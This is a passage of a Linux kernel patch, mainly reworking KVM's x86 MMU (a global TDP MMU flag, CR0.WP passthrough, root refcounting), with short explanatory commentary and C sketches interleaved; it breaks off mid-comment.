+@@ -244,7 +244,7 @@ void __init __weak plat_early_device_setup(void)
+ {
+ }
+ 
+-#ifdef CONFIG_OF_FLATTREE
++#ifdef CONFIG_OF_EARLY_FLATTREE
+ void __ref sh_fdt_init(phys_addr_t dt_phys)
+ {
+ 	static int done = 0;
+@@ -326,7 +326,7 @@ void __init setup_arch(char **cmdline_p)
+ 	/* Let earlyprintk output early console messages */
+ 	sh_early_platform_driver_probe("earlyprintk", 1, 1);
+ 
+-#ifdef CONFIG_OF_FLATTREE
++#ifdef CONFIG_OF_EARLY_FLATTREE
+ #ifdef CONFIG_USE_BUILTIN_DTB
+ 	unflatten_and_copy_device_tree();
+ #else
+diff --git a/arch/sh/math-emu/sfp-util.h b/arch/sh/math-emu/sfp-util.h
+index 784f541344f36..bda50762b3d33 100644
+--- a/arch/sh/math-emu/sfp-util.h
++++ b/arch/sh/math-emu/sfp-util.h
+@@ -67,7 +67,3 @@
+   } while (0)
+ 
+ #define abort()	return 0
+-
+-#define __BYTE_ORDER __LITTLE_ENDIAN
+-
+-
+diff --git a/arch/x86/include/asm/kvm_host.h b/arch/x86/include/asm/kvm_host.h
+index 24480b4f1c575..adc3149c833a9 100644
+--- a/arch/x86/include/asm/kvm_host.h
++++ b/arch/x86/include/asm/kvm_host.h
+@@ -1342,21 +1342,12 @@ struct kvm_arch {
+ 	struct task_struct *nx_huge_page_recovery_thread;
+ 
+ #ifdef CONFIG_X86_64
+-	/*
+-	 * Whether the TDP MMU is enabled for this VM. This contains a
+-	 * snapshot of the TDP MMU module parameter from when the VM was
+-	 * created and remains unchanged for the life of the VM. If this is
+-	 * true, TDP MMU handler functions will run for various MMU
+-	 * operations.
+-	 */
+-	bool tdp_mmu_enabled;
+-
+ 	/* The number of TDP MMU pages across all roots. */
+ 	atomic64_t tdp_mmu_pages;
+ 
+ 	/*
+-	 * List of kvm_mmu_page structs being used as roots.
+-	 * All kvm_mmu_page structs in the list should have
++	 * List of struct kvm_mmu_pages being used as roots.
++	 * All struct kvm_mmu_pages in the list should have
+ 	 * tdp_mmu_page set.
+ 	 *
+ 	 * For reads, this list is protected by:
+diff --git a/arch/x86/kernel/amd_nb.c b/arch/x86/kernel/amd_nb.c
+index 4266b64631a46..7e331e8f36929 100644
+--- a/arch/x86/kernel/amd_nb.c
++++ b/arch/x86/kernel/amd_nb.c
+@@ -36,6 +36,7 @@
+ #define PCI_DEVICE_ID_AMD_19H_M50H_DF_F4 0x166e
+ #define PCI_DEVICE_ID_AMD_19H_M60H_DF_F4 0x14e4
+ #define PCI_DEVICE_ID_AMD_19H_M70H_DF_F4 0x14f4
++#define PCI_DEVICE_ID_AMD_19H_M78H_DF_F4 0x12fc
+ 
+ /* Protect the PCI config register pairs used for SMN. */
+ static DEFINE_MUTEX(smn_mutex);
+@@ -79,6 +80,7 @@ static const struct pci_device_id amd_nb_misc_ids[] = {
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_AMD, PCI_DEVICE_ID_AMD_19H_M50H_DF_F3) },
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_AMD, PCI_DEVICE_ID_AMD_19H_M60H_DF_F3) },
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_AMD, PCI_DEVICE_ID_AMD_19H_M70H_DF_F3) },
++	{ PCI_DEVICE(PCI_VENDOR_ID_AMD, PCI_DEVICE_ID_AMD_19H_M78H_DF_F3) },
+ 	{}
+ };
+ 
+diff --git a/arch/x86/kvm/kvm_cache_regs.h b/arch/x86/kvm/kvm_cache_regs.h
+index c09174f73a344..451697a96cf33 100644
+--- a/arch/x86/kvm/kvm_cache_regs.h
++++ b/arch/x86/kvm/kvm_cache_regs.h
+@@ -4,7 +4,7 @@
+ 
+ #include <linux/kvm_host.h>
+ 
+-#define KVM_POSSIBLE_CR0_GUEST_BITS X86_CR0_TS
++#define KVM_POSSIBLE_CR0_GUEST_BITS	(X86_CR0_TS | X86_CR0_WP)
+ #define KVM_POSSIBLE_CR4_GUEST_BITS				  \
+ 	(X86_CR4_PVI | X86_CR4_DE | X86_CR4_PCE | X86_CR4_OSFXSR  \
+ 	 | X86_CR4_OSXMMEXCPT | X86_CR4_PGE | X86_CR4_TSD | X86_CR4_FSGSBASE)
+diff --git a/arch/x86/kvm/mmu.h b/arch/x86/kvm/mmu.h
+index 6bdaacb6faa07..0f38b78ab04b7 100644
+--- a/arch/x86/kvm/mmu.h
++++ b/arch/x86/kvm/mmu.h
+@@ -113,6 +113,8 @@ void kvm_init_shadow_ept_mmu(struct kvm_vcpu *vcpu, bool execonly,
+ bool kvm_can_do_async_pf(struct kvm_vcpu *vcpu);
+ int kvm_handle_page_fault(struct kvm_vcpu *vcpu, u64 error_code,
+ 				u64 fault_address, char *insn, int insn_len);
++void __kvm_mmu_refresh_passthrough_bits(struct kvm_vcpu *vcpu,
++					struct kvm_mmu *mmu);
+ 
+ int kvm_mmu_load(struct kvm_vcpu *vcpu);
+ void kvm_mmu_unload(struct kvm_vcpu *vcpu);
+@@ -153,6 +155,24 @@ static inline void kvm_mmu_load_pgd(struct kvm_vcpu *vcpu)
+ 					  vcpu->arch.mmu->root_role.level);
+ }
+ 
++static inline void kvm_mmu_refresh_passthrough_bits(struct kvm_vcpu *vcpu,
++						    struct kvm_mmu *mmu)
++{
++	/*
++	 * When EPT is enabled, KVM may passthrough CR0.WP to the guest, i.e.
++	 * @mmu's snapshot of CR0.WP and thus all related paging metadata may
++	 * be stale.  Refresh CR0.WP and the metadata on-demand when checking
++	 * for permission faults.  Exempt nested MMUs, i.e. MMUs for shadowing
++	 * nEPT and nNPT, as CR0.WP is ignored in both cases.  Note, KVM does
++	 * need to refresh nested_mmu, a.k.a. the walker used to translate L2
++	 * GVAs to GPAs, as that "MMU" needs to honor L2's CR0.WP.
++	 */
++	if (!tdp_enabled || mmu == &vcpu->arch.guest_mmu)
++		return;
++
++	__kvm_mmu_refresh_passthrough_bits(vcpu, mmu);
++}
++
+ /*
+  * Check if a given access (described through the I/D, W/R and U/S bits of a
+  * page fault error code pfec) causes a permission fault with the given PTE
+@@ -184,8 +204,12 @@ static inline u8 permission_fault(struct kvm_vcpu *vcpu, struct kvm_mmu *mmu,
+ 	u64 implicit_access = access & PFERR_IMPLICIT_ACCESS;
+ 	bool not_smap = ((rflags & X86_EFLAGS_AC) | implicit_access) == X86_EFLAGS_AC;
+ 	int index = (pfec + (not_smap << PFERR_RSVD_BIT)) >> 1;
+-	bool fault = (mmu->permissions[index] >> pte_access) & 1;
+ 	u32 errcode = PFERR_PRESENT_MASK;
++	bool fault;
++
++	kvm_mmu_refresh_passthrough_bits(vcpu, mmu);
++
++	fault = (mmu->permissions[index] >> pte_access) & 1;
+ 
+ 	WARN_ON(pfec & (PFERR_PK_MASK | PFERR_RSVD_MASK));
+ 	if (unlikely(mmu->pkru_mask)) {
+@@ -230,14 +254,14 @@ static inline bool kvm_shadow_root_allocated(struct kvm *kvm)
+ }
+ 
+ #ifdef CONFIG_X86_64
+-static inline bool is_tdp_mmu_enabled(struct kvm *kvm) { return kvm->arch.tdp_mmu_enabled; }
++extern bool tdp_mmu_enabled;
+ #else
+-static inline bool is_tdp_mmu_enabled(struct kvm *kvm) { return false; }
++#define tdp_mmu_enabled false
+ #endif
+ 
+ static inline bool kvm_memslots_have_rmaps(struct kvm *kvm)
+ {
+-	return !is_tdp_mmu_enabled(kvm) || kvm_shadow_root_allocated(kvm);
++	return !tdp_mmu_enabled || kvm_shadow_root_allocated(kvm);
+ }
+ 
+ static inline gfn_t gfn_to_index(gfn_t gfn, gfn_t base_gfn, int level)
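The mmu.h hunk above swaps the per-VM is_tdp_mmu_enabled() accessor for a
single global: 64-bit builds get a real extern bool, while 32-bit builds
see a compile-time "#define tdp_mmu_enabled false", so the compiler can
discard every TDP MMU branch outright without #ifdefs at the call sites.
A standalone sketch of the idiom, with hypothetical names:

#include <stdbool.h>
#include <stdio.h>

#ifdef FEATURE_64BIT
bool feature_enabled = true;	/* real storage; a module param in the kernel */
#else
#define feature_enabled false	/* constant: the branch below is compiled out */
#endif

int main(void)
{
	if (feature_enabled)	/* no #ifdef needed at any call site */
		puts("TDP-MMU-style fast path");
	return 0;
}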
+diff --git a/arch/x86/kvm/mmu/mmu.c b/arch/x86/kvm/mmu/mmu.c
+index 835426254e768..dcca08a08bd0c 100644
+--- a/arch/x86/kvm/mmu/mmu.c
++++ b/arch/x86/kvm/mmu/mmu.c
+@@ -99,6 +99,13 @@ module_param_named(flush_on_reuse, force_flush_and_sync_on_reuse, bool, 0644);
+  */
+ bool tdp_enabled = false;
+ 
++bool __ro_after_init tdp_mmu_allowed;
++
++#ifdef CONFIG_X86_64
++bool __read_mostly tdp_mmu_enabled = true;
++module_param_named(tdp_mmu, tdp_mmu_enabled, bool, 0444);
++#endif
++
+ static int max_huge_page_level __read_mostly;
+ static int tdp_root_level __read_mostly;
+ static int max_tdp_level __read_mostly;
+@@ -233,6 +240,20 @@ static struct kvm_mmu_role_regs vcpu_to_role_regs(struct kvm_vcpu *vcpu)
+ 	return regs;
+ }
+ 
++static unsigned long get_guest_cr3(struct kvm_vcpu *vcpu)
++{
++	return kvm_read_cr3(vcpu);
++}
++
++static inline unsigned long kvm_mmu_get_guest_pgd(struct kvm_vcpu *vcpu,
++						  struct kvm_mmu *mmu)
++{
++	if (IS_ENABLED(CONFIG_RETPOLINE) && mmu->get_guest_pgd == get_guest_cr3)
++		return kvm_read_cr3(vcpu);
++
++	return mmu->get_guest_pgd(vcpu);
++}
++
+ static inline bool kvm_available_flush_tlb_with_range(void)
+ {
+ 	return kvm_x86_ops.tlb_remote_flush_with_range;
+@@ -1279,7 +1300,7 @@ static void kvm_mmu_write_protect_pt_masked(struct kvm *kvm,
+ {
+ 	struct kvm_rmap_head *rmap_head;
+ 
+-	if (is_tdp_mmu_enabled(kvm))
++	if (tdp_mmu_enabled)
+ 		kvm_tdp_mmu_clear_dirty_pt_masked(kvm, slot,
+ 				slot->base_gfn + gfn_offset, mask, true);
+ 
+@@ -1312,7 +1333,7 @@ static void kvm_mmu_clear_dirty_pt_masked(struct kvm *kvm,
+ {
+ 	struct kvm_rmap_head *rmap_head;
+ 
+-	if (is_tdp_mmu_enabled(kvm))
++	if (tdp_mmu_enabled)
+ 		kvm_tdp_mmu_clear_dirty_pt_masked(kvm, slot,
+ 				slot->base_gfn + gfn_offset, mask, false);
+ 
+@@ -1395,7 +1416,7 @@ bool kvm_mmu_slot_gfn_write_protect(struct kvm *kvm,
+ 		}
+ 	}
+ 
+-	if (is_tdp_mmu_enabled(kvm))
++	if (tdp_mmu_enabled)
+ 		write_protected |=
+ 			kvm_tdp_mmu_write_protect_gfn(kvm, slot, gfn, min_level);
+ 
+@@ -1558,7 +1579,7 @@ bool kvm_unmap_gfn_range(struct kvm *kvm, struct kvm_gfn_range *range)
+ 	if (kvm_memslots_have_rmaps(kvm))
+ 		flush = kvm_handle_gfn_range(kvm, range, kvm_zap_rmap);
+ 
+-	if (is_tdp_mmu_enabled(kvm))
++	if (tdp_mmu_enabled)
+ 		flush = kvm_tdp_mmu_unmap_gfn_range(kvm, range, flush);
+ 
+ 	return flush;
+@@ -1571,7 +1592,7 @@ bool kvm_set_spte_gfn(struct kvm *kvm, struct kvm_gfn_range *range)
+ 	if (kvm_memslots_have_rmaps(kvm))
+ 		flush = kvm_handle_gfn_range(kvm, range, kvm_set_pte_rmap);
+ 
+-	if (is_tdp_mmu_enabled(kvm))
++	if (tdp_mmu_enabled)
+ 		flush |= kvm_tdp_mmu_set_spte_gfn(kvm, range);
+ 
+ 	return flush;
+@@ -1646,7 +1667,7 @@ bool kvm_age_gfn(struct kvm *kvm, struct kvm_gfn_range *range)
+ 	if (kvm_memslots_have_rmaps(kvm))
+ 		young = kvm_handle_gfn_range(kvm, range, kvm_age_rmap);
+ 
+-	if (is_tdp_mmu_enabled(kvm))
++	if (tdp_mmu_enabled)
+ 		young |= kvm_tdp_mmu_age_gfn_range(kvm, range);
+ 
+ 	return young;
+@@ -1659,7 +1680,7 @@ bool kvm_test_age_gfn(struct kvm *kvm, struct kvm_gfn_range *range)
+ 	if (kvm_memslots_have_rmaps(kvm))
+ 		young = kvm_handle_gfn_range(kvm, range, kvm_test_age_rmap);
+ 
+-	if (is_tdp_mmu_enabled(kvm))
++	if (tdp_mmu_enabled)
+ 		young |= kvm_tdp_mmu_test_age_gfn(kvm, range);
+ 
+ 	return young;
+@@ -1921,7 +1942,7 @@ static bool is_obsolete_sp(struct kvm *kvm, struct kvm_mmu_page *sp)
+ 		return true;
+ 
+ 	/* TDP MMU pages do not use the MMU generation. */
+-	return !sp->tdp_mmu_page &&
++	return !is_tdp_mmu_page(sp) &&
+ 	       unlikely(sp->mmu_valid_gen != kvm->arch.mmu_valid_gen);
+ }
+ 
+@@ -3596,7 +3617,7 @@ static int mmu_alloc_direct_roots(struct kvm_vcpu *vcpu)
+ 	if (r < 0)
+ 		goto out_unlock;
+ 
+-	if (is_tdp_mmu_enabled(vcpu->kvm)) {
++	if (tdp_mmu_enabled) {
+ 		root = kvm_tdp_mmu_get_vcpu_root_hpa(vcpu);
+ 		mmu->root.hpa = root;
+ 	} else if (shadow_root_level >= PT64_ROOT_4LEVEL) {
+@@ -3699,7 +3720,7 @@ static int mmu_alloc_shadow_roots(struct kvm_vcpu *vcpu)
+ 	int quadrant, i, r;
+ 	hpa_t root;
+ 
+-	root_pgd = mmu->get_guest_pgd(vcpu);
++	root_pgd = kvm_mmu_get_guest_pgd(vcpu, mmu);
+ 	root_gfn = root_pgd >> PAGE_SHIFT;
+ 
+ 	if (mmu_check_root(vcpu, root_gfn))
+@@ -4149,7 +4170,7 @@ static bool kvm_arch_setup_async_pf(struct kvm_vcpu *vcpu, gpa_t cr2_or_gpa,
+ 	arch.token = alloc_apf_token(vcpu);
+ 	arch.gfn = gfn;
+ 	arch.direct_map = vcpu->arch.mmu->root_role.direct;
+-	arch.cr3 = vcpu->arch.mmu->get_guest_pgd(vcpu);
++	arch.cr3 = kvm_mmu_get_guest_pgd(vcpu, vcpu->arch.mmu);
+ 
+ 	return kvm_setup_async_pf(vcpu, cr2_or_gpa,
+ 				  kvm_vcpu_gfn_to_hva(vcpu, gfn), &arch);
+@@ -4168,7 +4189,7 @@ void kvm_arch_async_page_ready(struct kvm_vcpu *vcpu, struct kvm_async_pf *work)
+ 		return;
+ 
+ 	if (!vcpu->arch.mmu->root_role.direct &&
+-	      work->arch.cr3 != vcpu->arch.mmu->get_guest_pgd(vcpu))
++	      work->arch.cr3 != kvm_mmu_get_guest_pgd(vcpu, vcpu->arch.mmu))
+ 		return;
+ 
+ 	kvm_mmu_do_page_fault(vcpu, work->cr2_or_gpa, 0, true);
+@@ -4530,11 +4551,6 @@ void kvm_mmu_new_pgd(struct kvm_vcpu *vcpu, gpa_t new_pgd)
+ }
+ EXPORT_SYMBOL_GPL(kvm_mmu_new_pgd);
+ 
+-static unsigned long get_cr3(struct kvm_vcpu *vcpu)
+-{
+-	return kvm_read_cr3(vcpu);
+-}
+-
+ static bool sync_mmio_spte(struct kvm_vcpu *vcpu, u64 *sptep, gfn_t gfn,
+ 			   unsigned int access)
+ {
+@@ -5038,6 +5054,21 @@ kvm_calc_cpu_role(struct kvm_vcpu *vcpu, const struct kvm_mmu_role_regs *regs)
+ 	return role;
+ }
+ 
++void __kvm_mmu_refresh_passthrough_bits(struct kvm_vcpu *vcpu,
++					struct kvm_mmu *mmu)
++{
++	const bool cr0_wp = !!kvm_read_cr0_bits(vcpu, X86_CR0_WP);
++
++	BUILD_BUG_ON((KVM_MMU_CR0_ROLE_BITS & KVM_POSSIBLE_CR0_GUEST_BITS) != X86_CR0_WP);
++	BUILD_BUG_ON((KVM_MMU_CR4_ROLE_BITS & KVM_POSSIBLE_CR4_GUEST_BITS));
++
++	if (is_cr0_wp(mmu) == cr0_wp)
++		return;
++
++	mmu->cpu_role.base.cr0_wp = cr0_wp;
++	reset_guest_paging_metadata(vcpu, mmu);
++}
++
+ static inline int kvm_mmu_get_tdp_level(struct kvm_vcpu *vcpu)
+ {
+ 	/* tdp_root_level is architecture forced level, use it if nonzero */
+@@ -5085,7 +5116,7 @@ static void init_kvm_tdp_mmu(struct kvm_vcpu *vcpu,
+ 	context->page_fault = kvm_tdp_page_fault;
+ 	context->sync_page = nonpaging_sync_page;
+ 	context->invlpg = NULL;
+-	context->get_guest_pgd = get_cr3;
++	context->get_guest_pgd = get_guest_cr3;
+ 	context->get_pdptr = kvm_pdptr_read;
+ 	context->inject_page_fault = kvm_inject_page_fault;
+ 
+@@ -5235,7 +5266,7 @@ static void init_kvm_softmmu(struct kvm_vcpu *vcpu,
+ 
+ 	kvm_init_shadow_mmu(vcpu, cpu_role);
+ 
+-	context->get_guest_pgd     = get_cr3;
++	context->get_guest_pgd     = get_guest_cr3;
+ 	context->get_pdptr         = kvm_pdptr_read;
+ 	context->inject_page_fault = kvm_inject_page_fault;
+ }
+@@ -5249,7 +5280,7 @@ static void init_kvm_nested_mmu(struct kvm_vcpu *vcpu,
+ 		return;
+ 
+ 	g_context->cpu_role.as_u64   = new_mode.as_u64;
+-	g_context->get_guest_pgd     = get_cr3;
++	g_context->get_guest_pgd     = get_guest_cr3;
+ 	g_context->get_pdptr         = kvm_pdptr_read;
+ 	g_context->inject_page_fault = kvm_inject_page_fault;
+ 
+@@ -5719,6 +5750,9 @@ void kvm_configure_mmu(bool enable_tdp, int tdp_forced_root_level,
+ 	tdp_root_level = tdp_forced_root_level;
+ 	max_tdp_level = tdp_max_root_level;
+ 
++#ifdef CONFIG_X86_64
++	tdp_mmu_enabled = tdp_mmu_allowed && tdp_enabled;
++#endif
+ 	/*
+ 	 * max_huge_page_level reflects KVM's MMU capabilities irrespective
+ 	 * of kernel support, e.g. KVM may be capable of using 1GB pages when
+@@ -5966,7 +6000,7 @@ static void kvm_mmu_zap_all_fast(struct kvm *kvm)
+ 	 * write and in the same critical section as making the reload request,
+ 	 * e.g. before kvm_zap_obsolete_pages() could drop mmu_lock and yield.
+ 	 */
+-	if (is_tdp_mmu_enabled(kvm))
++	if (tdp_mmu_enabled)
+ 		kvm_tdp_mmu_invalidate_all_roots(kvm);
+ 
+ 	/*
+@@ -5991,7 +6025,7 @@ static void kvm_mmu_zap_all_fast(struct kvm *kvm)
+ 	 * Deferring the zap until the final reference to the root is put would
+ 	 * lead to use-after-free.
+ 	 */
+-	if (is_tdp_mmu_enabled(kvm))
++	if (tdp_mmu_enabled)
+ 		kvm_tdp_mmu_zap_invalidated_roots(kvm);
+ }
+ 
+@@ -6017,9 +6051,11 @@ int kvm_mmu_init_vm(struct kvm *kvm)
+ 	INIT_LIST_HEAD(&kvm->arch.possible_nx_huge_pages);
+ 	spin_lock_init(&kvm->arch.mmu_unsync_pages_lock);
+ 
+-	r = kvm_mmu_init_tdp_mmu(kvm);
+-	if (r < 0)
+-		return r;
++	if (tdp_mmu_enabled) {
++		r = kvm_mmu_init_tdp_mmu(kvm);
++		if (r < 0)
++			return r;
++	}
+ 
+ 	node->track_write = kvm_mmu_pte_write;
+ 	node->track_flush_slot = kvm_mmu_invalidate_zap_pages_in_memslot;
+@@ -6049,7 +6085,8 @@ void kvm_mmu_uninit_vm(struct kvm *kvm)
+ 
+ 	kvm_page_track_unregister_notifier(kvm, node);
+ 
+-	kvm_mmu_uninit_tdp_mmu(kvm);
++	if (tdp_mmu_enabled)
++		kvm_mmu_uninit_tdp_mmu(kvm);
+ 
+ 	mmu_free_vm_memory_caches(kvm);
+ }
+@@ -6103,7 +6140,7 @@ void kvm_zap_gfn_range(struct kvm *kvm, gfn_t gfn_start, gfn_t gfn_end)
+ 
+ 	flush = kvm_rmap_zap_gfn_range(kvm, gfn_start, gfn_end);
+ 
+-	if (is_tdp_mmu_enabled(kvm)) {
++	if (tdp_mmu_enabled) {
+ 		for (i = 0; i < KVM_ADDRESS_SPACE_NUM; i++)
+ 			flush = kvm_tdp_mmu_zap_leafs(kvm, i, gfn_start,
+ 						      gfn_end, true, flush);
+@@ -6136,7 +6173,7 @@ void kvm_mmu_slot_remove_write_access(struct kvm *kvm,
+ 		write_unlock(&kvm->mmu_lock);
+ 	}
+ 
+-	if (is_tdp_mmu_enabled(kvm)) {
++	if (tdp_mmu_enabled) {
+ 		read_lock(&kvm->mmu_lock);
+ 		kvm_tdp_mmu_wrprot_slot(kvm, memslot, start_level);
+ 		read_unlock(&kvm->mmu_lock);
+@@ -6379,7 +6416,7 @@ void kvm_mmu_try_split_huge_pages(struct kvm *kvm,
+ 				   u64 start, u64 end,
+ 				   int target_level)
+ {
+-	if (!is_tdp_mmu_enabled(kvm))
++	if (!tdp_mmu_enabled)
+ 		return;
+ 
+ 	if (kvm_memslots_have_rmaps(kvm))
+@@ -6400,7 +6437,7 @@ void kvm_mmu_slot_try_split_huge_pages(struct kvm *kvm,
+ 	u64 start = memslot->base_gfn;
+ 	u64 end = start + memslot->npages;
+ 
+-	if (!is_tdp_mmu_enabled(kvm))
++	if (!tdp_mmu_enabled)
+ 		return;
+ 
+ 	if (kvm_memslots_have_rmaps(kvm)) {
+@@ -6483,7 +6520,7 @@ void kvm_mmu_zap_collapsible_sptes(struct kvm *kvm,
+ 		write_unlock(&kvm->mmu_lock);
+ 	}
+ 
+-	if (is_tdp_mmu_enabled(kvm)) {
++	if (tdp_mmu_enabled) {
+ 		read_lock(&kvm->mmu_lock);
+ 		kvm_tdp_mmu_zap_collapsible_sptes(kvm, slot);
+ 		read_unlock(&kvm->mmu_lock);
+@@ -6518,7 +6555,7 @@ void kvm_mmu_slot_leaf_clear_dirty(struct kvm *kvm,
+ 		write_unlock(&kvm->mmu_lock);
+ 	}
+ 
+-	if (is_tdp_mmu_enabled(kvm)) {
++	if (tdp_mmu_enabled) {
+ 		read_lock(&kvm->mmu_lock);
+ 		kvm_tdp_mmu_clear_dirty_slot(kvm, memslot);
+ 		read_unlock(&kvm->mmu_lock);
+@@ -6553,7 +6590,7 @@ restart:
+ 
+ 	kvm_mmu_commit_zap_page(kvm, &invalid_list);
+ 
+-	if (is_tdp_mmu_enabled(kvm))
++	if (tdp_mmu_enabled)
+ 		kvm_tdp_mmu_zap_all(kvm);
+ 
+ 	write_unlock(&kvm->mmu_lock);
+@@ -6718,6 +6755,13 @@ void __init kvm_mmu_x86_module_init(void)
+ 	if (nx_huge_pages == -1)
+ 		__set_nx_huge_pages(get_nx_auto_mode());
+ 
++	/*
++	 * Snapshot userspace's desire to enable the TDP MMU. Whether or not the
++	 * TDP MMU is actually enabled is determined in kvm_configure_mmu()
++	 * when the vendor module is loaded.
++	 */
++	tdp_mmu_allowed = tdp_mmu_enabled;
++
+ 	kvm_mmu_spte_module_init();
+ }
+ 
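Two patterns in the mmu.c hunks deserve a note. First, the module
parameter is snapshotted once at module init (tdp_mmu_allowed) and the
effective value recomputed in kvm_configure_mmu(), so the now read-only
0444 parameter can never desynchronize from live VMs. Second,
kvm_mmu_get_guest_pgd() compares the hook against get_guest_cr3 and calls
the target directly on a match: under CONFIG_RETPOLINE every indirect
call goes through a thunk, so devirtualizing the overwhelmingly common
case sidesteps that cost. A standalone sketch of the second pattern, with
hypothetical names rather than KVM's:

#include <stdio.h>

struct mmu { unsigned long (*get_guest_pgd)(void); };

static unsigned long get_guest_cr3_sim(void) { return 0x1000; }

static unsigned long mmu_get_guest_pgd(struct mmu *mmu)
{
	/* Devirtualize the common case: a direct call skips the
	 * retpoline thunk that an indirect call would pay for. */
	if (mmu->get_guest_pgd == get_guest_cr3_sim)
		return get_guest_cr3_sim();

	return mmu->get_guest_pgd();	/* rare: genuinely indirect */
}

int main(void)
{
	struct mmu m = { .get_guest_pgd = get_guest_cr3_sim };

	printf("pgd = %#lx\n", mmu_get_guest_pgd(&m));
	return 0;
}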
+diff --git a/arch/x86/kvm/mmu/paging_tmpl.h b/arch/x86/kvm/mmu/paging_tmpl.h
+index 0f64550720557..89b19b7ef4f9f 100644
+--- a/arch/x86/kvm/mmu/paging_tmpl.h
++++ b/arch/x86/kvm/mmu/paging_tmpl.h
+@@ -324,7 +324,7 @@ static int FNAME(walk_addr_generic)(struct guest_walker *walker,
+ 	trace_kvm_mmu_pagetable_walk(addr, access);
+ retry_walk:
+ 	walker->level = mmu->cpu_role.base.level;
+-	pte           = mmu->get_guest_pgd(vcpu);
++	pte           = kvm_mmu_get_guest_pgd(vcpu, mmu);
+ 	have_ad       = PT_HAVE_ACCESSED_DIRTY(mmu);
+ 
+ #if PTTYPE == 64
+diff --git a/arch/x86/kvm/mmu/tdp_mmu.c b/arch/x86/kvm/mmu/tdp_mmu.c
+index d6df38d371a00..c649a333792b8 100644
+--- a/arch/x86/kvm/mmu/tdp_mmu.c
++++ b/arch/x86/kvm/mmu/tdp_mmu.c
+@@ -10,23 +10,15 @@
+ #include <asm/cmpxchg.h>
+ #include <trace/events/kvm.h>
+ 
+-static bool __read_mostly tdp_mmu_enabled = true;
+-module_param_named(tdp_mmu, tdp_mmu_enabled, bool, 0644);
+-
+ /* Initializes the TDP MMU for the VM, if enabled. */
+ int kvm_mmu_init_tdp_mmu(struct kvm *kvm)
+ {
+ 	struct workqueue_struct *wq;
+ 
+-	if (!tdp_enabled || !READ_ONCE(tdp_mmu_enabled))
+-		return 0;
+-
+ 	wq = alloc_workqueue("kvm", WQ_UNBOUND|WQ_MEM_RECLAIM|WQ_CPU_INTENSIVE, 0);
+ 	if (!wq)
+ 		return -ENOMEM;
+ 
+-	/* This should not be changed for the lifetime of the VM. */
+-	kvm->arch.tdp_mmu_enabled = true;
+ 	INIT_LIST_HEAD(&kvm->arch.tdp_mmu_roots);
+ 	spin_lock_init(&kvm->arch.tdp_mmu_pages_lock);
+ 	kvm->arch.tdp_mmu_zap_wq = wq;
+@@ -47,10 +39,17 @@ static __always_inline bool kvm_lockdep_assert_mmu_lock_held(struct kvm *kvm,
+ 
+ void kvm_mmu_uninit_tdp_mmu(struct kvm *kvm)
+ {
+-	if (!kvm->arch.tdp_mmu_enabled)
+-		return;
++	/*
++	 * Invalidate all roots, which, besides the obvious, schedules all roots
++	 * for zapping and thus puts the TDP MMU's reference to each root, i.e.
++	 * ultimately frees all roots.
++	 */
++	kvm_tdp_mmu_invalidate_all_roots(kvm);
+ 
+-	/* Also waits for any queued work items.  */
++	/*
++	 * Destroying a workqueue also first flushes the workqueue, i.e. no
++	 * need to invoke kvm_tdp_mmu_zap_invalidated_roots().
++	 */
+ 	destroy_workqueue(kvm->arch.tdp_mmu_zap_wq);
+ 
+ 	WARN_ON(atomic64_read(&kvm->arch.tdp_mmu_pages));
+@@ -126,16 +125,6 @@ static void tdp_mmu_schedule_zap_root(struct kvm *kvm, struct kvm_mmu_page *root
+ 	queue_work(kvm->arch.tdp_mmu_zap_wq, &root->tdp_mmu_async_work);
+ }
+ 
+-static inline bool kvm_tdp_root_mark_invalid(struct kvm_mmu_page *page)
+-{
+-	union kvm_mmu_page_role role = page->role;
+-	role.invalid = true;
+-
+-	/* No need to use cmpxchg, only the invalid bit can change.  */
+-	role.word = xchg(&page->role.word, role.word);
+-	return role.invalid;
+-}
+-
+ void kvm_tdp_mmu_put_root(struct kvm *kvm, struct kvm_mmu_page *root,
+ 			  bool shared)
+ {
+@@ -144,45 +133,12 @@ void kvm_tdp_mmu_put_root(struct kvm *kvm, struct kvm_mmu_page *root,
+ 	if (!refcount_dec_and_test(&root->tdp_mmu_root_count))
+ 		return;
+ 
+-	WARN_ON(!root->tdp_mmu_page);
+-
+ 	/*
+-	 * The root now has refcount=0.  It is valid, but readers already
+-	 * cannot acquire a reference to it because kvm_tdp_mmu_get_root()
+-	 * rejects it.  This remains true for the rest of the execution
+-	 * of this function, because readers visit valid roots only
+-	 * (except for tdp_mmu_zap_root_work(), which however
+-	 * does not acquire any reference itself).
+-	 *
+-	 * Even though there are flows that need to visit all roots for
+-	 * correctness, they all take mmu_lock for write, so they cannot yet
+-	 * run concurrently. The same is true after kvm_tdp_root_mark_invalid,
+-	 * since the root still has refcount=0.
+-	 *
+-	 * However, tdp_mmu_zap_root can yield, and writers do not expect to
+-	 * see refcount=0 (see for example kvm_tdp_mmu_invalidate_all_roots()).
+-	 * So the root temporarily gets an extra reference, going to refcount=1
+-	 * while staying invalid.  Readers still cannot acquire any reference;
+-	 * but writers are now allowed to run if tdp_mmu_zap_root yields and
+-	 * they might take an extra reference if they themselves yield.
+-	 * Therefore, when the reference is given back by the worker,
+-	 * there is no guarantee that the refcount is still 1.  If not, whoever
+-	 * puts the last reference will free the page, but they will not have to
+-	 * zap the root because a root cannot go from invalid to valid.
++	 * The TDP MMU itself holds a reference to each root until the root is
++	 * explicitly invalidated, i.e. the final reference should never be
++	 * put for a valid root.
+ 	 */
+-	if (!kvm_tdp_root_mark_invalid(root)) {
+-		refcount_set(&root->tdp_mmu_root_count, 1);
+-
+-		/*
+-		 * Zapping the root in a worker is not just "nice to have";
+-		 * it is required because kvm_tdp_mmu_invalidate_all_roots()
+-		 * skips already-invalid roots.  If kvm_tdp_mmu_put_root() did
+-		 * not add the root to the workqueue, kvm_tdp_mmu_zap_all_fast()
+-		 * might return with some roots not zapped yet.
+-		 */
+-		tdp_mmu_schedule_zap_root(kvm, root);
+-		return;
+-	}
++	KVM_BUG_ON(!is_tdp_mmu_page(root) || !root->role.invalid, kvm);
+ 
+ 	spin_lock(&kvm->arch.tdp_mmu_pages_lock);
+ 	list_del_rcu(&root->link);
+@@ -330,7 +286,14 @@ hpa_t kvm_tdp_mmu_get_vcpu_root_hpa(struct kvm_vcpu *vcpu)
+ 	root = tdp_mmu_alloc_sp(vcpu);
+ 	tdp_mmu_init_sp(root, NULL, 0, role);
+ 
+-	refcount_set(&root->tdp_mmu_root_count, 1);
++	/*
